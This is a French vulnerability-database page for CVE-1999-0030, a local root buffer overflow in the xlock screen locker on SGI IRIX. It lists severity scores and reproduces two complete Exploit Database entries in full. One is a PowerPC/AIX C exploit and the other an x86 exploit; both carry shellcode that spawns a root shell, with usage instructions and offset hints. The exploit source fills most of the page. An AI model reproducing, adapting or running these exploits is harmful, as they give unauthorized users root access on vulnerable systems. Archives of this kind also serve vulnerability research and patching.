CVE-1999-0030 : Détail

CVE-1999-0030

0.04%V3
Local
2000-02-04
04h00 +00:00
2024-08-01
16h27 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

root privileges via buffer overflow in xlock command on SGI IRIX systems.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 19173

Date de publication : 1997-04-25 22h00 +00:00
Auteur : BeastMaster
EDB Vérifié : Yes

/* source: https://www.securityfocus.com/bid/224/info The xlock program is used to lock the local X display until the user supplies the correct password. A buffer overflow condition has been discovered in xlock that may allow an unauthorized user to gain root access. */ /* * * /usr/bin/X11/xlock exploit (kinda' coded) by BeastMaster V * * CREDITS: this code is simply a modified version of an exploit * posted by Georgi Guninski (guninski@hotmail.com) * * USAGE: * $ cc -o foo -g aix_xlock.c * $ ./foo 3200 * # * * HINT: Try giving ranges from 3100 through 3400 * (If these ranges don't work, then run the brute * korn shell script provided after the exploit) * * DISCLAIMER: use this program in a responsible manner. * */ #include <stdio.h> #include <stdlib.h> #include <string.h> extern int execv(); #define MAXBUF 600 unsigned int code[]={ 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c , 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , 0x7c0903a6 , 0x4e800420, 0x0 }; char *createvar(char *name,char *value) { char *c; int l; l=strlen(name)+strlen(value)+4; if (! (c=malloc(l))) {perror("error allocating");exit(2);}; strcpy(c,name); strcat(c,"="); strcat(c,value); putenv(c); return c; } main(int argc,char **argv,char **env) { unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt; int min=200, max=300; unsigned int return_address; char *newenv[8]; char *args[4]; int offset=3200; if (argc==2) offset = atoi(argv[1]); pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; *((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff); *((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff); *((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff); *((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff); return_address=(unsigned)&buf[0]+offset; for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82; strcpy((char*)&buf[nop],(char*)&code); i=nop+strlen( (char*) &code)/4-1; for(i=0;i<max-1;i++) frame[i]=return_address; frame[i]=0; newenv[0]=createvar("EGGSHEL",(char*)&buf[0]); newenv[1]=createvar("EGGSHE2",(char*)&buf[0]); newenv[2]=createvar("EGGSHE3",(char*)&buf[0]); newenv[3]=createvar("EGGSHE4",(char*)&buf[0]); newenv[4]=createvar("DISPLAY",getenv("DISPLAY")); newenv[5]=createvar("HOME",(char*)&frame[0]); args[0]="xlock"; execve("/usr/bin/X11/xlock",args,newenv); perror("Error executing execve \n"); }
Exploit Database EDB-ID : 19172

Date de publication : 1997-04-25 22h00 +00:00
Auteur : cesaro
EDB Vérifié : Yes

/* source: https://www.securityfocus.com/bid/224/info The xlock program is used to lock the local X display until the user supplies the correct password. A buffer overflow condition has been discovered in xlock that may allow an unauthorized user to gain root access. */ /* x86 XLOCK overflow exploit by cesaro@0wned.org 4/17/97 Original exploit framework - lpr exploit Usage: make xlock-exploit xlock-exploit <optional_offset> Assumptions: xlock is suid root, and installed in /usr/X11/bin */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 996 long get_esp(void) { __asm__("movl %esp,%eax\n"); } int main(int argc, char *argv[]) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int dfltOFFSET = DEFAULT_OFFSET; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; int i; if (argc > 1) dfltOFFSET = atoi(argv[1]); else printf("You can specify another offset as a parameter if you need...\n"); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + dfltOFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL); }

Products Mentioned

Configuraton 0

Sgi>>Irix >> Version *

Références